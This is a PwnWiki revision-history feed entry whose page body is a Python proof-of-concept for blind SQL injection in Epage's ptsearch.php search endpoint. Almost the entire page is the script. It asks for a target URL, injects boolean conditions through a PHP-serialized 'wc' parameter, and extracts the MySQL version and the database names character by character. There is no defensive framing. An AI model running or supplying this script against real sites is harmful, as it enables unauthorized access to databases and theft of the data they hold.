https://pwnwiki.com/index.php?action=history&feed=atom&title=Epage_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E Epage SQL注入漏洞 - Revision history 2026-04-10T03:39:13Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Epage_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=6616&oldid=prev Pwnwiki: Created page with "==POC== <pre> import requests import time print("Blind SQL injection in php Serialize POC") url=input("Target url:") url += "/bin/ptsearch.php?wc=a:3:{s:3:\"Key\";s:@:\"*\";s..." 2021-07-10T06:09:21Z <p>Created page with &quot;==POC== &lt;pre&gt; import requests import time print(&quot;Blind SQL injection in php Serialize POC&quot;) url=input(&quot;Target url:&quot;) url += &quot;/bin/ptsearch.php?wc=a:3:{s:3:\&quot;Key\&quot;;s:@:\&quot;*\&quot;;s...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> import requests<br /> import time<br /> <br /> print(&quot;Blind SQL injection in php Serialize POC&quot;)<br /> url=input(&quot;Target url:&quot;)<br /> url += &quot;/bin/ptsearch.php?wc=a:3:{s:3:\&quot;Key\&quot;;s:@:\&quot;*\&quot;;s:8:\&quot;pagesize\&quot;;s:2:\&quot;10\&quot;;s:3:\&quot;Rcg\&quot;;i:0;}&quot;<br /> <br /> print(&quot;start parsing&quot;)<br /> print(&quot;&quot;)<br /> print(&quot;MYSQL version:&quot;)<br /> for i in range(1,10,2):<br /> for k in range(0,10):<br /> session = requests.Session()<br /> closed_sql='\&quot;and({inject})and\&quot;%\&quot;=\&quot;'<br /> inject_sql= closed_sql.format(inject=&quot;substring(version(),{i},1)=\&quot;{k}\&quot;&quot;)<br /> inject_sql= inject_sql.format(i=i,k=k)<br /> inject_url=url.replace(&quot;@&quot;,str(len(inject_sql)))<br /> inject_url=inject_url.replace(&quot;*&quot;,inject_sql)<br /> r = session.get(inject_url)<br /> r.encoding = 'utf-8'<br /> <br /> if(&quot;未找到符合條件的資料&quot; not in r.text):<br /> print(k,end=&quot;.&quot;)<br /> print(&quot;version detect complete,take a break...........&quot;)<br /> print()<br /> print()<br /> time.sleep(5)<br /> <br /> print(&quot;parsing lenth of available database..............&quot;)<br /> all_valid_database=0<br /> for i in range(1,50):<br /> session = requests.Session()<br /> closed_sql='\&quot;and({inject})and\&quot;%\&quot;=\&quot;'<br /> inject_sql= closed_sql.format(inject=&quot;(ascii(substring((select(group_concat(schema_name))from(information_schema.schemata)),{i},1)))&gt;0&quot;)<br /> inject_sql= inject_sql.format(i=i)<br /> inject_url=url.replace(&quot;@&quot;,str(len(inject_sql)))<br /> inject_url=inject_url.replace(&quot;*&quot;,inject_sql)<br /> r = session.get(inject_url)<br /> r.encoding = 'utf-8'<br /> if(&quot;未找到符合條件的資料&quot; in r.text):<br /> all_valid_database = i<br /> print(all_valid_database)<br /> break<br /> <br /> print(&quot;parsing finish,take a break&quot;)<br /> time.sleep(3)<br /> <br /> print(&quot;start parsing available database&quot;)<br /> print(&quot;available database:&quot;)<br /> for i in range(1,all_valid_database):<br /> time.sleep(2)<br /> for k in range(32,126):<br /> session = requests.Session()<br /> closed_sql='\&quot;and({inject})and\&quot;%\&quot;=\&quot;'<br /> inject_sql= closed_sql.format(inject=&quot;(ascii(substring((select(group_concat(schema_name))from(information_schema.schemata)),{i},1)))&gt;{k}&quot;)<br /> inject_sql= inject_sql.format(i=i,k=k)<br /> inject_url=url.replace(&quot;@&quot;,str(len(inject_sql)))<br /> inject_url=inject_url.replace(&quot;*&quot;,inject_sql)<br /> r = session.get(inject_url)<br /> r.encoding = 'utf-8'<br /> <br /> if(&quot;未找到符合條件的資料&quot; in r.text):<br /> if (k==44):<br /> print(chr(k),end=&quot;&quot;)<br /> print()<br /> else:<br /> print(chr(k),end=&quot;&quot;)<br /> break<br /> &lt;/pre&gt;</div> Pwnwiki